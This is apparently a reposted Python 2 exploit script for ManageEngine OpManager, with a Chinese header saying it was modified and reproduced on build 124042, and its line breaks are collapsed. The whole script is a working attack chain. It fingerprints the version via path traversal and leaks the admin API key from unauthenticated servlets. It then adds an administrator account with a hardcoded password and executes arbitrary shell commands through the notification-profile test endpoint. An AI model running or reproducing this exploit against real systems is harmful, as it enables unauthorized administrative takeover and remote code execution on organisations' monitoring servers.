修正原始Exp部分内容 成功复现版本 124042

#!/usr/bin/python2import requests
import sys
import urllib3
import jsonurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)class OpManagerExploit():def __init__(self,url):self.url = urlself.ver = Noneself.api_key = Falsedef FindVer(self):ver_req = requests.get(self.url+'/js/%2e%2e/html/About.properties',verify=False,allow_redirects=False)if ver_req.status_code != 200:print '[-] Unexpected response to fingerprinting request, Bailing.'return Falseif ver_req.text.find('BUILD_NUMBER') == -1 or ver_req.text.find('BUILD_VERSION') == -1:print '[-] Unable to read OpManager version, Bailing'return Falset = ver_req.textself.ver = int(t[t.find('BUILD_NUMBER')+13:t.find('\n',t.find('BUILD_NUMBER'))].strip())print '\n[+] Build version of opManager is {}'.format(self.ver)print '[+] Found OpManager Version {}'.format(t[t.find('BUILD_VERSION')+13:t.find('\n',t.find('BUILD_VERSION'))].strip())def LeakApiKey(self):if self.ver >= 123127:leak_d = {'reqFrm':'fwacs','key':'true','user':'admin','process':'apikey'}leak_r = requests.post(self.url+'/servlet/sendData',verify=False,data = leak_d)if leak_r.status_code != 200:print '[-] Failed to extract API KEY.'return Falseif leak_r.text.find('key=Start') == -1:print '[-] Invalid response in LeakApiKey()'return Falsed = leak_r.textapi_key = d[d.find('key=Start',d.find('key=Start')+11)+10:].strip()print '[+] Got API Key {}'.format(api_key)return api_keyelse:leak_d = {'action':'getAPIKey'}leak_r = requests.post(self.url+'/oputilsServlet',verify=False,data = leak_d)if leak_r.status_code != 200:print '[-] Failed to extract API KEY.'return Falsed = leak_r.textif d.find('API_KEY=') == -1:print '[-] Failed to extract API key'return Falseapi_key = d[d.find('API_KEY=')+8:d.find('\n',d.find('API_KEY='))]print '[+] Got API Key {}'.format(api_key)return api_keydef AddUser(self,interact=False):if self.api_key is False:print '[+] Leaking API key to add a new user'self.api_key = self.LeakApiKey()if self.api_key is False:print '[-] Failed to leak api to add a user'return Falseif interact == 
True:username = raw_input('Username > ')password = raw_input('Password > ')else:username = 'support@localhost.net'password = 'P@ssw0rd'print '[+] Adding a new admin user'add_d = 'apiKey='+self.api_key+'&userName='+username+'&privilege=Administrators&password='+password+'&emailId='+username+'&tZone=null'print "url: {}, add_d: {}".format(self.url, add_d)add_r = requests.post(self.url+'/api/json/v2/admin/addUser?'+add_d,verify=False,headers={'Accept':'application/json'})if add_r.status_code != 200:print '[-] Failed to add a new user, invalid response'return Falseelse:try:resp = json.loads(add_r.text)except:print '[-] Failed to add user, Invalid response data'print "add_r: {}".format(add_r.content)return Falseif resp.keys()[0] == 'error':print '[+] Error {} while adding user'.format(resp['error']['message'])return Falseelse:print '[+] Success, Response from server: {}'.format(resp['result']['message'])return Truedef DeleteUser(self,interact=False):if self.api_key is False:print '[+] Leaking API key to delete a user'self.api_key = self.LeakApiKey()if self.api_key is False:print '[-] Failed to leak api to delete a user'return Falseif interact == True:username = raw_input('Username to delete> ')else:username = 'support@localhost.net'users_list = requests.get(self.url+'/api/json/nfausers/getAllUsers?apiKey='+self.api_key,verify=False).texttry:usl = json.loads(users_list)except:print '[-] Failed to obtain user list'return Falseuser_id = Nonefor u in usl:if u['uName'] == username:user_id = int(u['uID'])print '[+] Found user id {}'.format(user_id)breakif user_id is None:print '[-] Username not found 'return Falsedel_r = requests.post(self.url+'/api/json/admin/deleteUser?'+'apiKey='+self.api_key+"&userName"+username,data={"userName":username},verify=False)if del_r.status_code == 200:print '[+] User deleted successfully'return Trueelse:print '[-] User deletion Failed.'return Falsedef ExecuteCommand(self):if self.api_key is False:print '[+] Leaking API key for RCE'self.api_key = 
self.LeakApiKey()if self.api_key is False:print '[-] Failed to leak api for RCE'return Falseif self.AddUser() is False:print '[-] Failed to add user for RCE'return Falseprint '[+] Loggin in with the added user'proxies={'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}login_dat = {'AUTHRULE_NAME':'Authenticator','clienttype':'html','ScreenWidth':'1920','ScreenHeight':'602','loginFromCookieData':'false','ntlmv2':'false','j_username':'support@localhost.net','j_password':'P@ssw0rd','signInAutomatically':'on','uname':''}sess = requests.Session()headers = {'Content-Type': 'application/x-www-form-urlencoded'}sess.get(self.url+'/apiclient/ember/Login.jsp',verify=False,allow_redirects=False)login_r = sess.post(self.url+'/apiclient/ember/j_security_check',headers=headers,data=login_dat,verify=False)#print login_r.textif login_r.status_code != 200 :print '[+] Login Failed...'self.DeleteUser()return Falseprint '[+] Login Successful.'command = raw_input('Command to execute> ')if self.ver > 123127:cmd_d = {'append':'true','command':command,'selectedseverities':'1,2,3,4','checkedhardwareMonitor':'true','selectAllhardwareMonitor':'true','selectedDevicesStr':'127.0.0.53','twoption':'All','profileType':'Run System Command','name':'POP'}#headers = {'X-ZCSRF-TOKEN': 'opmcsrftoken='+sess.cookies.get_dict()['opmcsrfcookie']}cmd_r = sess.post(self.url+'/client/api/json/admin/testNProfile',headers=headers,verify=False,data=cmd_d,allow_redirects=False,proxies=proxies)else:cmd_d = {'command':command,'selectedseverities':'1,2,3,4','checkeddevicemissespolls':'true','noofpolls':'1','deviceCategory':'iv_12','twoption':'All','profileType':'Run System Command','name':'as'}cmd_r = sess.post(self.url+'/api/json/admin/testNProfile?apiKey='+self.api_key,verify=False,data=cmd_d,allow_redirects=False,proxies=proxies)try:output = json.loads(cmd_r.text)except:print '[-] Invalid Response data from RCE request'self.DeleteUser()return Falseif output.keys()[0] == 'result':print '[+] Command 
successfully executed: {}'.format(output)print '[+] Done with RCE, Cleaning up user'self.DeleteUser()return Truedef Exploit(self):print '[+] Starting Exploit\n[+] Please choose operation'print '\t1) Execute Shell Command\n\t2) Add an admin user\n\t3) Delete a user\n\t4) Leak admin API Key'ch = raw_input("Choice> ")if ch == '1':self.ExecuteCommand()elif ch == '2':self.AddUser(interact=True)elif ch == '3':self.DeleteUser(interact=True)elif ch == '4':self.LeakApiKey()else:print '[-] wth is {}'.format(ch)if __name__ == '__main__':if len(sys.argv) < 2:print '[+] Usage: {} <url>'.format(sys.argv[0])exit(1)ex = OpManagerExploit(sys.argv[1].strip())if ex.FindVer() == False:exit(1)ex.Exploit()


